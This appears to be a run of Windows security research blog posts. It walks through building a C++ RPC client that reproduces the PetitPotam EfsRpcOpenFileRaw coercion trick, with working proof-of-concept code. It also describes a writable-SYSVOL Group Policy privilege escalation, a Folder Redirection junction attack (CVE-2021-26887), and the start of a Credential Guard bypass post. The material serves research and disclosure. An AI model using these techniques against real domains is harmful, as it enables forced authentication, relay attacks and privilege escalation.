This isn’t very convenient, but there is a cool thing about most Windows binaries. Microsoft publishes their associated PDB (Program DataBase) file.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

From RpcView to PetitPotam

In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.

The Theory

Before diving into the main subject, I need to discuss some basic concepts first to make sure we are all on the same page. First, as I said in the previous post, DCE/RPC is one of the many IPC (InterProcess Communication) mechanisms used in Windows. It allows a process A - the RPC client - to invoke procedures or functions that are implemented and executed in a process B - the RPC server.

That being said, this raises some questions that I will quickly cover in the next paragraphs.

  • How does an RPC client distinguish an RPC server from another?
  • How does an RPC client know which procedures/functions are exposed by the RPC server?
  • How does an RPC client invoke the remote procedures/functions?

Interface Definition

I assume you are familiar with the concept of interface in the context of Object Oriented Programming (OOP). An interface is a sort of contract, consisting of a set of methods, that an Object must fulfill by implementing those said methods. With RPC, that’s exactly the same idea. The difference is that the methods are implemented in another process, and can even be accessed from a remote machine on the network.

If a client wants to consume an interface, they first need to know what is written in the interface’s contract. In other words, they need the following information:

  • The GUID of the interface : how to identify the interface?
  • A protocol sequence: how to interact with this interface?
  • An Opnum (i.e. a procedure ID): which procedure to call?
  • A set of parameters: what information does the server need in order to execute the procedure?

For that matter, the developer of an RPC server will usually release an IDL (Interface Definition Language) file. The purpose of this file is to provide the developer of an RPC client with all the information they need in order to consume this interface, without having to worry about its actual implementation on server-side. In a way, IDL for RPC interfaces is very similar to what WSDL/WADL are for web services and applications.

As an example, PetitPotam leverages the Encrypting File System Remote Protocol (EFSRPC), which is based on the EFSR interface. You can find the complete IDL file corresponding to this interface here, but I also included an extract below.

import "ms-dtyp.idl";

[
    uuid(c681d488-d850-11d0-8c52-00c04fd90f7e),
    version(1.0),
]

interface efsrpc
{
    typedef [context_handle] void * PEXIMPORT_CONTEXT_HANDLE;
    typedef pipe unsigned char EFS_EXIM_PIPE;
    
    /* [snip] */

    long EfsRpcOpenFileRaw(
        [in]            handle_t                   binding_h,
        [out]           PEXIMPORT_CONTEXT_HANDLE * hContext,
        [in, string]    wchar_t                  * FileName,
        [in]            long                       Flags
    );

    long EfsRpcReadFileRaw(
        [in]            PEXIMPORT_CONTEXT_HANDLE   hContext,
        [out]           EFS_EXIM_PIPE            * EfsOutPipe
    );

    /* [snip] */
}

In this file, we can find the UUID (Universal Unique Identifier) of the interface, some type definitions, and the prototype of the exposed procedures or functions. That’s all the information a client needs in order to invoke remote procedures.

Protocol Sequence

Knowing which procedures/functions are exposed by an interface isn’t actually sufficient to interact with it. The client also needs to know how to access this interface. The way a client talks to an RPC server is called the protocol sequence. Depending on the implementation of the RPC server, a given interface might even be accessible through multiple protocol sequences.

Generally speaking, Windows supports three protocols (source):

RPC Protocol Description
NCACN Network Computing Architecture connection-oriented protocol
NCADG Network Computing Architecture datagram protocol
NCALRPC Network Computing Architecture local remote procedure call

RPC protocols used for remote connections (NCACN and NCADG) through a network can be supported by many “transport” protocols. The most common transport protocol is obviously TCP/IP, but other more exotic protocols can also be used, such as IPX/SPX or AppleTalk DSP. The complete list of supported transport protocols is available here.

Although 14 Protocol Sequences are supported, only 4 of them are commonly used:

Protocol Sequence Description
ncacn_ip_tcp Connection-oriented Transmission Control Protocol/Internet Protocol (TCP/IP)
ncacn_np Connection-oriented named pipes
ncacn_http Connection-oriented TCP/IP using Microsoft Internet Information Server as HTTP proxy
ncalrpc Local procedure call

For instance, when using ncacn_np, the DCE/RPC requests are encapsulated inside SMB packets and sent to a remote named pipe. On the other hand, when using ncacn_ip_tcp, DCE/RPC requests are directly sent over TCP. I made the following diagram to illustrate these 4 protocol sequences.

Binding Handles

Once you know the definition of the interface and which protocol to use, you have (almost) all the information you need to connect or bind to the remote or local RPC server.

This concept is quite similar to how kernel object handles work. For example, when you want to write some data to a file, you first call CreateFile to open it. In return, the kernel gives you a handle that you can then use to write your data by passing the handle to WriteFile. Similarly, with RPC, you connect to an RPC server by creating a binding handle, that you can then use to invoke procedures or functions on the interface you requested access to. It’s as simple as that.

Note: this analogy is limited though as the RPC client initiates its own binding handle. The RPC server is then responsible for ensuring that the client has the appropriate privileges to invoke a given procedure.

Unlike with kernel object handles though, there are multiple types of binding handles: automatic, implicit and explicit. This type determines how much work a client has to do in order to initialize and/or manage the binding handle. In this post, I will cover only one example, but I made another diagram to illustrate these different cases.

For instance, if an RPC server requires the use of explicit binding handles, as a client, you have to write some code to create it first and then you have to explicitly pass it as an argument for each procedure call. On the other hand, if the server requires the use of automatic binding handles, you can just call a remote procedure, and the RPC runtime will take care of everything else, such as connecting to the server, passing the binding handle and closing it when it’s done.

The “PetitPotam” case

The EFSRPC protocol is widely documented here but, for the sake of this blog post, we will just pretend that this documentation does not exist. So, we will first see how we can collect all the information we need with RpcView. Then, we will see how we can use this information to write a simple RPC client application. Finally, we will use this RPC client application to experiment a bit and see what we can do with the exposed RPC procedures.

Exploring the EFSRPC Interface with RpcView

Let’s imagine we are randomly browsing the output of RpcView, searching for interesting procedure names. Since we downloaded the PDB files for all the DLLs that are in C:\Windows\System32 and we configured the appropriate path in the options (see part 1), this should feel pretty much like playing a video game. :nerd_face:

When clicking on the LSASS process (1), we can see that it contains many RPC interfaces. So we go through them one by one and we stop on the one with the GUID c681d488-d850-11d0-8c52-00c04fd90f7e (2) because it exposes several procedures that seem to perform file operations (according to their name) (3).

File operations initiated by low-privileged users and performed by privileged processes (such as services running as SYSTEM) are always interesting to investigate because they might lead to local privilege escalation (or even remote code execution in some cases). On top of that, they are relatively easy to find and visualize, using Process Monitor for instance.

In this example, RpcView provides other very useful information. It shows that the interface we selected is exposed through a named pipe: \pipe\lsass (4). It also shows us the name of the process, the path of the executable on disk and the user it runs as (5). Finally, we know that this interface is part of the “LSA extension for EFS”, which is implemented in C:\Windows\System32\efslsaext.dll (6).

Collecting all the Required Information

As I explained at the beginning of this post, in order to interact with an RPC server, a client needs some information: the ID of the interface, the protocol sequence to use and, last but not least, the definition of the interface itself. As we have seen in the previous part, RpcView already gives us the ID of the interface and the protocol sequence, but what about the interface’s definition?

  • ID of the interface: c681d488-d850-11d0-8c52-00c04fd90f7e
  • Protocol sequence: ncacn_np
  • Name of the endpoint: \pipe\lsass

And here comes what probably is the most powerful feature of RpcView. If you select the interface you are interested in, and right-click on it, you will see an option that allows you to “decompile” it. The “decompiled” IDL code will then appear in the “Decompilation” window right above it.

Although this feature is very powerful, it is not 100% reliable. So, don’t expect it to always produce a usable file, straight out of the box. Besides, some information such as the name of the structures is inevitably lost in the process. In the next parts, I will cover some common errors you may encounter when using the generated IDL file.

Creating an RPC Client for the EFSRPC Interface in C/C++

Now that we have all the information we need, we can create an RPC client in C/C++ and start playing around with the interface.

As I already explained how to install and set up Visual Studio, I won’t go through this step again in this post. Please note that I’m using Visual Studio Community 2019 and the latest version of the Windows 10 SDK is also installed. The versions should not be that important though as we are not doing anything fancy.

Let’s fire up Visual Studio and create a new C++ Console App project.

I will simply name this new project EfsrClient and save it in C:\Workspace.

Visual Studio will automatically create the file EfsrClient.cpp, which contains the main function along with some comments explaining how to compile and build the project. Usually, I get rid of these comments, and I rewrite the main function as follows, just to start with a clean file.

int wmain(int argc, wchar_t* argv[])
{
    
}

The next thing you want to do is go back to RpcView, select the “decompiled” interface definition, copy its content, and save it as a new file in your project. To do so, you can simply right-click on the “Source Files” folder, and then Add > New Item....

In the dialog box, we can select the C++ File (.cpp) template, and enter something like efsr.idl in the Name field. Although the template is not important, the extension of the file must be .idl because it determines which compiler Visual Studio will use for this file. In this case, it will use the MIDL compiler.

Once this is done, you should have a new file called efsr.idl in the “Source Files” folder. Next, we can right-click on our IDL file and compile it. But before doing so, make sure to select the appropriate target architecture: x86 or x64 here. Indeed, the MIDL compiler produces an architecture dependent code so, if you compile the IDL file for the x86 architecture and later decide to compile you application for the x64 architecture, you will most likely get into trouble.

If all goes well, you should see something like this in the Build Output window.

At this point, the MIDL compiler has created 3 files:

File Type Intended for Description
efsr_h.h Header file Client and Server Essentially function and structure definitions, well that’s a header file…
efsr_c.c Source file Client Code for the RPC runtime on client side
efsr_s.c Source file Server Code for the RPC runtime on server side, we don’t need this file

Although these files were created in the solution’s folder, they are not automatically added to the solution itself, so we need to do this manually.

  1. Right-click on the “Header Files” folder, Add > Existing Item... > efsr_h.h > Add.
  2. Right-click on the “Source Files” folder, Add > Existing Item... > efsr_c.c > Add.

Before going any further, we should make sure that both the header and the source files are well formed.

Here we can see that there is a problem with the file efsr_h.h. Some structure definitions were inserted in the middle of two function prototypes.

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out]pipe char* arg_1);

long Proc2_EfsRpcWriteFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [in]pipe char* arg_1);

If we check the definition of these two functions in the IDL file, we can see that the keyword pipe was inserted, but the MIDL compiler didn’t handle it properly. For now, we can simply remove this keyword and compile again.

Note: the type identified by RpcView was actually correct but, because of the syntax, the compiler failed to produce the correct output code. In the original IDL file, the type of arg_1 is EFS_EXIM_PIPE*, where EFS_EXIM_PIPE is indeed defined as a pipe unsigned char.

When dealing with IDL files generated by RpcView, this kind of error should be expected as the “decompilation” process is not supposed to produce an 100% usable result, straight out of the box. With time and practice though, you can quickly spot these issues and fix them.

After doing that, the header file looks much better. We no longer have syntax errors in this file.

The thing I usually do next is simply include the header file in the main source code, and compile as is to check if we have any errors.

#include "efsr_h.h"

int wmain(int argc, wchar_t* argv[])
{
    
}

Here we have 3 errors. The files were successfully compiled but the linker was not able to resolve some symbols: NdrClientCall3, MIDL_user_free, and MIDL_user_allocate.

First things first, the functions MIDL_user_allocate and MIDL_user_free are used to allocate and free memory for the RPC stubs. They are documented here and here. When implementing an RPC application, they must be defined somewhere in the application. It sounds more complicated than it really is though. In practice, we just have to add the following code to our main file.

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR *) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
    free(p);
}

If we try to build the project again, we should see that the errors are now gone, and were replaced by two warnings that we can ignore.

One error remains though: the linker can’t find the NdrClientCall3 function. The NdrClientCall* functions are the cornerstone of the communication between the client and the server as they basically do all the heavy lifting on your behalf. Whenever you call a remote procedure, they serialize your parameters, send your request as a packet to the server, receive the response, deserialize it, and finally return the result.

As an example, here is what the definition of the EfsRpcOpenFileRaw procedure looks like in efsr_c.c. You can see that, on client side, EfsRpcOpenFileRaw basically consists of a “simple” call to NdrClientCall3.

long Proc0_EfsRpcOpenFileRaw_Downlevel( 
    /* [context_handle][out] */ void **arg_1,
    /* [string][in] */ wchar_t *arg_2,
    /* [in] */ long arg_3)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  0,
                  0,
                  arg_1,
                  arg_2,
                  arg_3);
    return ( long  )_RetVal.Simple;
}

Note: I intentionally did not modify the function names generated by RpcView to highlight the fact that they do not matter. In the end, the server just receives an Opnum value, which is a numeric value that identifies the procedure to call internally. In the case of EfsRpcOpenFileRaw, this value would be 0 (second argument of NdrClientCall3).

CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(
  MIDL_STUBLESS_PROXY_INFO *pProxyInfo,
  unsigned long            nProcNum,
  void                     *pReturnValue,
  ...                      
);

Let’s return to our error message. When the linker is not able to resolve a function symbol, it usually means that we have to explicitly specify where it can find it. And by “where”, I mean “in which DLL”. This kind of information can usually be found in the documentation, so let’s check what we can find about the NdrClientCall3 function here.

The documentation tells us that the NdrClientCall3 function is exported by the RpcRT4.dll DLL. Nothing surprising as it’s the DLL that implements the RPC runtime (remember my previous post?). This means that we have to reference the RpcRT4.lib file in our application. To do so, I personally use the following directive rather than modifying the configuration of the project.

#pragma comment(lib, "RpcRT4.lib")

If you followed along, your code should look like this, and you should also be able to build the project.

Writing a PoC

We already went through a lot of steps at this point, and our application still does nothing. So it’s time to see how to invoke a remote procedure. This process usually goes like this.

  1. Call RpcStringBindingCompose to create the string representation of the binding, you can think of it as a URL.
  2. Call RpcBindingFromStringBinding to create the binding handle based on the previous binding string.
  3. Call RpcStringFree to free the binding string as we don’t need it anymore.
  4. Optionally call RpcBindingSetAuthInfo or RpcBindingSetAuthInfoEx to set explicit authentication information on our binding handle.
  5. Use the binding handle to invoke remote procedures.
  6. Call RpcBindingFree to free the binding handle.

In my case, this yields the following stub code:

#include "efsr_h.h"
#include <iostream>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Note: I would recommended invoking remote procedures inside a try/catch because exceptions are quite common in the context of the RPC runtime. Sometimes exceptions simply occur because the syntax of the request is incorrect but, in other cases, servers can also just throw exceptions rather than returning an error code.

We can already compile this code and make sure everything is OK. RPC functions return an RPC_STATUS code. If they execute successfully, they return the value 0, which means RPC_S_OK. If that’s not the case, you can check the documentation here to determine what’s wrong, or you can even write a function to print the corresponding Win32 error message.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] RpcBindingFree status code: 0

Now that we have our binding handle, we can try and invoke the EfsRpcOpenFileRaw procedure. But wait… There is a problem with the function’s prototype. It doesn’t take a binding handle as an argument.

If we go back to the definition of the function in the IDL file, we can see that there is indeed an issue. The argument list should start with arg_0, as shown in the next procedure, EfsRpcReadFileRaw. Therefore, something is missing.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out] char* arg_1);

The missing arg_0 argument is precisely the binding handle we need to pass to the RPC runtime. It’s a typical error I’ve encountered numerous times with RpcView. However, I don’t know if it’s a problem with the tool or a misunderstanding on my part.

Another thing that should tip you off is the fact that the EfsRpcOpenFileRaw procedure returns a context handle as an output value ([out][context_handle] void** arg_1). This is a very common thing for RPC servers. They often expose a procedure that takes a binding handle as an input value and yields a context handle that you must use in later RPC calls.

So, let’s fix this and compile the IDL file once again.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [in]handle_t arg_0,
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

Now, we know that arg_0 is the binding handle. We also know that arg_1 is a reference to the output context handle. Here, we suppose we don’t know the details of the context structure, but that’s not an issue. We can just pass a reference to an arbitrary void* variable. Then, we don’t know what arg_2 and arg_3 are. Since arg_2 is a wchar_t* and the name of the procedure is EfsRpcOpenFileRaw we can assume that arg_2 is supposed to be a file path. The value of arg_3 is yet to be determined. However, we know that it’s a long so we can arbitrarily set it to 0, and see what happens.

RpcTryExcept
{
    // Invoke remote procedure here
    PVOID pContext;
    LPWSTR pwszFilePath;
    long result;

    pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
    StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");

    wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
    result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
    wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

    LocalFree(pwszFilePath);
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
    wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
}
RpcEndExcept
C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: C:\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 5
[*] RpcBindingFree status code: 0

Running this code, EfsRpcOpenFileRaw fails with the standard Win32 error code 5, which means “Access denied”. This kind of error can be very frustrating because you don’t really know what is going wrong. An “Access denied” error can be returned for a large number of reasons (e.g.: insufficient privileges, wrong combination of parameters, etc.).

Normally, you would have to start reversing the target procedure in order to determine why the server returns this error. However, for the sake of conciseness, I will cheat a bit and just check the documentation. In the documentation of EfsRpcOpenFileRaw, you can read that the third parameter is indeed a “FileName”, but more precisely, it’s an “EFSRPC identifier”. And according to this documentation, “EFSRPC identifiers” are supposed to be UNC paths. So, we can change the following line of code and see if this solves the problem.

StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

After modifying the code, the server now returns the error code 2, which means “File not found”. That’s a good sign.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: \\127.0.0.1\C$\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 2
[*] RpcBindingFree status code: 0

Identifying a Interesting Behavior

With Process Monitor running in the background, we can see that lsass.exe indeed tried to access the file \\127.0.0.1\C$\Workspace\foo123.txt, which does not exist, hence the “File not found” error.

However, if we check the details of the CreateFile operation, we can see that the RPC server is actually impersonating the client. In other words, we could have simply called CreateFile ourselves and the result would have been the same.

What’s interesting though is what happens before lsass.exe tries to access the target file. Indeed, it opens the named pipe \pipe\srvsvc, this time without impersonating the client. If you saw my post about PrintSpoofer, you know that a similar behavior was observed with the Print Spooler server, which tried to open the named pipe \pipe\spoolss.

Of course, the NT AUTHORITY\SYSTEM account cannot be used for network authentication. So, when invoking this procedure with a remote path on a domain-joined machine, Windows will actually use the machine account to authenticate on the remote server. This explains why “PetitPotam” is able to coerce an arbitrary Windows host to authenticate to another machine.

And here is the final code.

#include "efsr_h.h"
#include <iostream>
#include <strsafe.h>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
        PVOID pContext;
        LPWSTR pwszFilePath;
        long result;

        pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
        //StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");
        StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

        wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
        result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
        wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

        LocalFree(pwszFilePath);
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Conclusion

In this blog post, we saw how it was possible to get all the information we need from RpcView to build a lightweight client application in C/C++. In particular, we saw how we could reproduce the “PetitPotam” trick by invoking the EfsRpcOpenFileRaw procedure of the EFSR interface. I tried to include as much details as I could, but of course, I cannot cover every aspect of Windows RPC in a single post. If you are interested in Windows RPC, @0xcsandker also wrote an excellent blog post about this subject here: Offensive Windows IPC Internals 2: RPC. His posts are always worth a read as they are thorough and aggregate a lot of information.

I also tried to cover some practical issues and errors you often encounter when implementing an RPC client in C/C++. But again, you will have to deal with a lot of other errors when compiling or invoking remote procedures, if you decide to go this route. Thankfully, a lot of Windows RPC interfaces are documented, such as EFSRPC, so that’s a good starting point.

Finally, implementing an RPC client in C/C++ isn’t necessarily the best approach if you are doing some security oriented research as this process is rather time-consuming. However, I would still recommend it because it is a good way to learn and have a better understanding of some Windows internals. As an alternative, a more research oriented approach would consist in using the NtObjectManager module developed by James Forshaw. This module is quite powerful as it allows you to interact with an RPC server in a few lines of PowerShell. As usual, James wrote an excellent article about it here: Calling Local Windows RPC Servers from .NET.

Links & Resources

A not-so-common and stupid privilege escalation

Some time ago, I was doing a Group Policy assessment in order to check for possible misconfigurations. Apart running the well known tools, I usually take a look at the shared SYSVOL policy folder. The SYSVOL folder is accessible in read-only by all domain users & domain computers. My attention was caught at some point by the “Files.xml” files located under a specific user policy:

This policy settings were related to the “File Preference” Group policy settings running under the user configuration.

According to Microsoft this policy allows you to:

In this case, an exe file (CleanupTask.exe) was copied from a shared folder under a specific location under “Program Files” folder (the folder names are invented for confidentiality reasons). The “CleanupTask” executable was run by the Windows Task Scheduler every hour under the SYSTEM user.

The first question was, why not running under the computer configuration? Short answer: only some users had this “custom application” installed which needed to be replaced, so the policy was filtered for a particular users group, in our case “CustomApp” group and luckily my user “user1” was member of this group.

The policy was executed without impersonating the user (so under the SYSTEM context), otherwise I would have found and entry “userContext=1” in the xml file. This was necessary because a standard user cannot write in %ProgramFiles%

In addition the policy was run only once (FilterRunOnce), which would have prevented multiple copies each time the user logged in.

To sum it up this was the policy configuration from the DC perspective:

Now that I had a clear vision of this policy, I took a look at the shared hidden folder.. and guess what? It was writable for domain users, a real dangerous misconfig…

I think you already got it, I could place an evil executable (reverse shell, add my user to local admins and so on) in this directory, perform a gpupdate /force which would copy the evil program in “Program Files\CustomApp\Maintenance” and the wait for the CleanUptask to execute….

But I had still a problem, this policy was applied only once and in my case I was already too late.. so no way? Not at all. The evidence that the policy has already been executed is stored under a particular location in the Windows Registry under the “Current User” hive which we can modify…

All I needed to do was deleting the guid referring to the filter id of the group policy and then run gpudate /force again and perform all the nasty things…

Misconfigurations in Group Policies, especially those involving file operations can be very dangerous, so publish them after an extremely careful review 😉

Group Policy Folder Redirection CVE-2021-26887

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with CVE-2021-26887 even if they did not really fix the issue (“folder redirection component interacts with the underlying NTFS file system has made this vulnerability particularly challenging to fix”). The proposed solution was reconfiguring Folder Redirection with Offline files and restricting permission.

I completely forgot about this case until the last few days when I came across my report and then decided to publish my findings (don’t expect nothing very sophisticated)

There is also an “important” update at the end.. so keep on reading 🙂

Summary

If “Folder Redirection” has been enabled via Group Policy and the redirected folders are hosted on a network share, it is possible for a standard user who has access on this file server to access other user’s folders and files (information disclosure) and eventually perform code execution and privilege escalation

Prerequisites

  1. A Domain User Group Policy with “Folder Redirection” has to be configured.
  2. A standard local or domain user has be able to login on the file server configures with the folder redirection shares (rdp, WinRm, ssh,…)
  3. There have to be domain users which will logon for the first time or will have the folder redirection policy applied for the first time

 

Steps to reproduce

In this example I used 3 VM’s:

  1. Windows 2019 Server acting as Domain Controller
  2. Windows 2019 Member Server acting as File Server
  3. Windows 10 domain joined client

On the domain controller I create a “Folder Redirection” Policy. In my example, I’m going to use the “Default Domain Policy” and redirect two folders, the user’s “Documents” and “AppData” Folder on a network share located on server “S01”.

The policy can be found in the SYSVOL share of the DC’s:

The folder redirected share is accessible via network path \\S01\users$. The permissions on this folder have been configured on server “S01” according to MS document: https://docs.microsoft.com/en-us/windows-server/storage/folder-redirection/deploy-folder-redirection

In my case “S01\Users” group is the group which will be applied the policy because this group contains the “Domain Users” groups too.

Each time domain user login to the domain the documents & appdata  folders (in this case) are saved on the network share. If it the first time the user logs in, the necessary directories are created under the share with strict permissions:

Someone could think to create the necessary directories before the domain users logs in, grant himself and the domain user full control and then access this private folder and data afterwards.

This is not possible, because during the first logon, if the folder already exists, a strict check on ownership and permissions are made and if they don’t match the folder will not be used. (I verified this with “procmon”)

But if the shared directory has valid permissions and owner, during the subsequent logins, no more checks on permissions are made and this could be a potential security issue.

How can I accomplish this? This is what I will do:

As a standard local/domain user login on the server where the shares are hosted (I know this is not so common..)

I will create a “junction” for the “a new” user who did not login to domain up to now or did not apply the Folder Redirection policy. (Finding “new” users is a real easy task for a standard domain user, so I won’t explain it). In my case, for example, “domainuser3”

Now I have to wait for domainuser3 to login from his Windows 10 (in my case) Documents…)

The Folder Redirection policy has been applied and permissions are set on the folders.

But as we can see on the fileserver S01, my junction point has been followed too, the real location of the folders is here:

Now, all the malicious user “localuser” has to do is wait for the domainuser3 logoff , delete the junction , create the new folders under the original share:

… and the set the permissions (Documents & AppData in our case) so that “everyone” will be granted full control:

Given that in my case the “AppData” folder is also redirected, we could place a “malicious” program in the user’s Startup folder which will then be executed at login (for example a reverse shell)

At this point, “localuser” has to wait for the next login of “domainuser3”

And will get a shell impersonating domainuser3 (imagine if it was a high privileged user):

Of course he will be able to access with full control permissions the documents folder:

Conclusions:

Even if the pre-conditions are not so “common”, this vulnerability could easily lead to information disclosure and EoP.

Update

So far the report, but when I read again the mitigations suggested by MS something was not so clear. The first time the user logs in, the necessary security checks are performed, so why did they say that it was not possible to fix? All they had to do was to perform these checks not only at the first logon, right?

My best guess is that if the profile, or more precisely the registry entry HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\<user_sid> is not found, checks are performed otherwise skipped.

A quick test demonstrated that I was right, after the first logon, I deleted the registry entry and security checks were again performed.

Maybe that the answer is in fdeploy.dll, for example in CEngine::_ProcessFRPolicy, I need to investigate further… or maybe I’m missing something, but this exercise is left to the reader.

That’s all 😉

Revisiting a Credential Guard Bypass

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.

Background

